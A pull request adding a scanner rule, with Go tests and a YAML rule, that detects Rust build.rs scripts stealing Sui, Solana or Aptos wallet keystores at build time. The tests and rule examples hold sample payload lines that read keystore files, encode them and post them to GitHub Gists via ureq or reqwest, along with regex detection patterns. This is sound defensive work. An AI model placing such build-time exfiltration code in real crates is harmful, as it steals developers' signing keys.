### PR TITLE
feat(scan): detect Rust build.rs wallet/keystore exfiltration

### DIFF
--- a/internal/engine/pattern/matcher_test.go
+++ b/internal/engine/pattern/matcher_test.go
@@ -610,3 +610,79 @@ func TestPyImportTimeRemoteJS_RequiresAllThreeSignals(t *testing.T) {
 		})
 	}
 }
+
+func rsBuildWalletExfilFires(t *testing.T, m *pattern.Matcher, relPath, content string) bool {
+	t.Helper()
+	findings, err := m.Analyze(context.Background(), &scanner.Target{RelPath: relPath, Content: []byte(content)})
+	require.NoError(t, err)
+	for _, f := range findings {
+		if f.RuleID == "RS_BUILD_WALLET_EXFIL_001" {
+			return true
+		}
+	}
+	return false
+}
+
+// TestRsBuildWalletExfil_TargetPrecision: the rule fires only in
+// build.rs (the build-time execution context). The same keystore-read +
+// network code in a regular source file or docs must NOT fire -- reading
+// a wallet at runtime in a wallet app is legitimate; the threat is a
+// build script doing it.
+func TestRsBuildWalletExfil_TargetPrecision(t *testing.T) {
+	m := fullBuiltinMatcher(t)
+	payload := "let k = std::fs::read_to_string(format!(\"{}/.sui/sui_config/sui.keystore\", home)).unwrap();\n" +
+		"ureq::post(\"https://api.github.com/gists\").send_string(&base64::encode(k));\n"
+
+	require.True(t, rsBuildWalletExfilFires(t, m, "build.rs", payload), "should fire in build.rs")
+	require.False(t, rsBuildWalletExfilFires(t, m, "src/main.rs", payload), "must not fire in a regular source file (runtime, not build-time)")
+	require.False(t, rsBuildWalletExfilFires(t, m, "README.md", payload), "must not fire in documentation")
+}
+
+// TestRsBuildWalletExfil_RequiresBothGroups: a build.rs needs BOTH a
+// keystore read AND a network exfil sink. Either alone is benign (a
+// build that reads a path without sending it; a build that calls the
+// network without touching a keystore; cc::Build native compilation).
+func TestRsBuildWalletExfil_RequiresBothGroups(t *testing.T) {
+	m := fullBuiltinMatcher(t)
+	cases := []struct {
+		name    string
+		content string
+	}{
+		{"keystore read, no network", "let k = std::fs::read_to_string(\"/home/u/.solana/id.json\").unwrap();\nprintln!(\"cargo:rerun-if-changed=build.rs\");\n"},
+		{"network, no keystore", "ureq::get(\"https://crates.io/api/v1/crates/foo\").call().unwrap();\n"},
+		{"cc::Build native compile", "cc::Build::new().file(\"src/native/foo.c\").compile(\"foo\");\n"},
+		{"docs-like wallet mention in a comment, no network", "// build.rs reads ~/.sui/sui_config/sui.keystore at app runtime, not here\n"},
+		// Keystore path only in a comment, plus a legitimate build-time
+		// network fetch. The path is not bound to a read API, so the
+		// keystore-read signal does not fire even though a network sink
+		// is present.
+		{"comment-only keystore path + legit network fetch", "// note: app reads ~/.sui/sui_config/sui.keystore at runtime\nlet meta = ureq::get(\"https://crates.io/api/v1/crates/foo\").call().unwrap();\n"},
+		// Path is CONSTRUCTED (PathBuf/join) but never read, plus a
+		// legitimate network fetch. Construction is not a read, so the
+		// keystore-read signal does not fire.
+		{"constructed keystore path (not read) + legit network", "let p = PathBuf::from(home).join(\".sui\").join(\"sui.keystore\");\nlet meta = ureq::get(\"https://crates.io/api/v1/crates/foo\").call().unwrap();\n"},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			require.False(t, rsBuildWalletExfilFires(t, m, "build.rs", tc.content),
+				"a missing behavior group must not produce a finding")
+		})
+	}
+}
+
+// TestRsBuildWalletExfil_CommentNearReadStillFires is a regression test
+// for an over-aggressive comment exclusion: a real keystore read with an
+// innocent comment a couple of lines above (the common shape of the
+// actual payload) must still fire. A prior exclude_patterns: ["^//"]
+// suppressed it because isExcluded scans up to 3 lines before the match.
+func TestRsBuildWalletExfil_CommentNearReadStillFires(t *testing.T) {
+	m := fullBuiltinMatcher(t)
+	payload := "fn main() {\n" +
+		"    // build-time keystore theft: read, encode, exfil\n" +
+		"    let home = std::env::var(\"HOME\").unwrap();\n" +
+		"    let k = std::fs::read_to_string(format!(\"{}/.sui/sui_config/sui.keystore\", home)).unwrap();\n" +
+		"    ureq::post(\"https://api.github.com/gists\").send_string(&base64::encode(k.as_bytes())).ok();\n" +
+		"}\n"
+	require.True(t, rsBuildWalletExfilFires(t, m, "build.rs", payload),
+		"a real keystore read must fire even with an innocent comment nearby")
+}

--- a/internal/rules/builtin/supply-chain.yaml
+++ b/internal/rules/builtin/supply-chain.yaml
@@ -648,3 +648,40 @@ examples:
     - "subprocess.run(['node', 'scripts/build.js'])  # local build, no remote fetch"
     - "js = requests.get('https://cdn.example/foo.js').text; subprocess.run(['node', 'scripts/build.js'])  # fetched asset, but node runs a local file, not -e the payload"
     - "# Optional: pipe results.js through node -e after you download it yourself"
+---
+id: RS_BUILD_WALLET_EXFIL_001
+name: "Rust build.rs wallet/keystore exfiltration"
+description: "Detects a Cargo build script (build.rs) that reads crypto wallet or keystore material (Sui / Move / Solana / Aptos keystores, mnemonics) and sends it over the network. This is the TrapDoor-style crates.io payload: build-time theft of signing keys. Chain-based: requires BOTH a keystore reference AND a network exfil sink in the build script, so a build.rs that merely compiles native code or a normal app that reads a wallet without any network does not trip it."
+severity: CRITICAL
+category: supply-chain
+targets: ["build.rs"]
+match_mode: all
+remediation: "Build scripts must never read wallet or keystore material or open network connections to send it. Remove the keystore read and the network sink from build.rs. Audit the host and rotate any wallet keys, mnemonics, or signing keys reachable from the build environment."
+patterns:
+  # (1) A keystore READ: the wallet/keystore path must appear inside an
+  # actual Rust read/open call (read_to_string, fs::read, read_to_end,
+  # File::open), not merely constructed (format!/PathBuf/Path/join) or
+  # stored as a doc/rerun string. [^;]{0,80} keeps the read API and the
+  # path within the same statement. A path-only comment lacks a read API
+  # and does not match; a fully commented-out read call is a known
+  # residual (the matcher does not parse Rust comments -- see the
+  # follow-up issue). We do NOT exclude // lines, because the prior
+  # 3-line-lookback comment exclusion suppressed real reads that merely
+  # had a comment nearby.
+  - type: regex
+    value: "(?i)(read_to_string|read_to_end|fs::read\\b|File::open)[^;]{0,80}(sui\\.keystore|\\.sui/|\\.solana/|solana/id\\.json|\\.aptos/|wallet\\.dat|\\.electrum/|keystore\\.json)"
+  # (2) A network exfil sink.
+  - type: regex
+    value: "(?i)(reqwest::|ureq::|hyper::Client|surf::|isahc::|api\\.github\\.com/gists|gist\\.github\\.com|TcpStream::connect)"
+examples:
+  true_positive:
+    - "let key = std::fs::read_to_string(format!(\"{}/.sui/sui_config/sui.keystore\", home))?; let enc = xor(key.as_bytes(), b\"cargo-build-helper-2026\"); ureq::post(\"https://api.github.com/gists\").send_string(&base64::encode(enc));"
+    - "let id = std::fs::read(\"/home/u/.config/solana/id.json\")?; reqwest::blocking::Client::new().post(\"https://gist.github.com/api\").body(base64::encode(id)).send().ok();"
+  false_positive:
+    - "cc::Build::new().file(\"src/native/foo.c\").compile(\"foo\");  // normal native build, no keystore, no network"
+    - "let cfg = std::fs::read_to_string(\"$HOME/.solana/id.json\")?; println!(\"cargo:rerun-if-changed={}\", cfg);  // reads a path but never sends it"
+    - "ureq::get(\"https://crates.io/api/v1/crates/foo\").call()?;  // network, but no keystore access"
+    - "// build.rs note: the app later reads ~/.sui/sui_config/sui.keystore at runtime"
+    - "// docs: app reads ~/.sui/sui_config/sui.keystore at runtime; let meta = ureq::get(\"https://crates.io/api/v1/crates/foo\").call()?;"
+    - "let p = PathBuf::from(home).join(\".sui\").join(\"sui.keystore\"); let meta = ureq::get(\"https://crates.io/api/v1/crates/foo\").call()?;  // builds a path but never reads it"
+    - "// std::fs::read_to_string(\"~/.sui/sui_config/sui.keystore\")  // commented-out example, not real code"


### PR DESCRIPTION
## What

Adds `RS_BUILD_WALLET_EXFIL_001` (supply-chain, CRITICAL): the TrapDoor-style crates.io payload that steals crypto wallet/keystore material at build time.

## Detection contract

- **`build.rs` only** (the build-time execution context).
- **Requires an actual wallet/keystore read API** (`read_to_string` / `fs::read` / `read_to_end` / `File::open`) with a Sui / Move / Solana / Aptos keystore path in the same statement. Merely constructing a path or mentioning it does not count.
- **Requires a network exfil sink** (GitHub Gists, `reqwest` / `ureq` / `hyper` / `surf`, `TcpStream::connect`).
- `match_mode: all` -- both signals are required; either alone is benign.
- **Does not parse Rust AST** and **does not prove full data flow** from the read buffer to the network sink (a pattern rule cannot). Residual parser/data-flow limits are documented and tracked in a follow-up issue.
- **Concrete false positives from review are regression-tested**: a bare path mention, a constructed-but-unread path, `cc::Build`, a network call without keystore access, a keystore read without network, plus a regression that a real read still fires when an innocent comment sits nearby.

## Verification

- Rule self-test + through-matcher self-test (positive path); target-precision (the same payload in a regular source file or README does NOT fire); the both-groups-required cases above.
- Offline Docker smoke: `ghcr.io/garagon/aguara:0.18.4` → 0 findings; this branch → 1 CRITICAL on `build.rs`; a benign `cc::Build` `build.rs` → 0.

## Scope

One rule plus test additions. No npm propagation, no AI persistence, no release prep, no version bump.
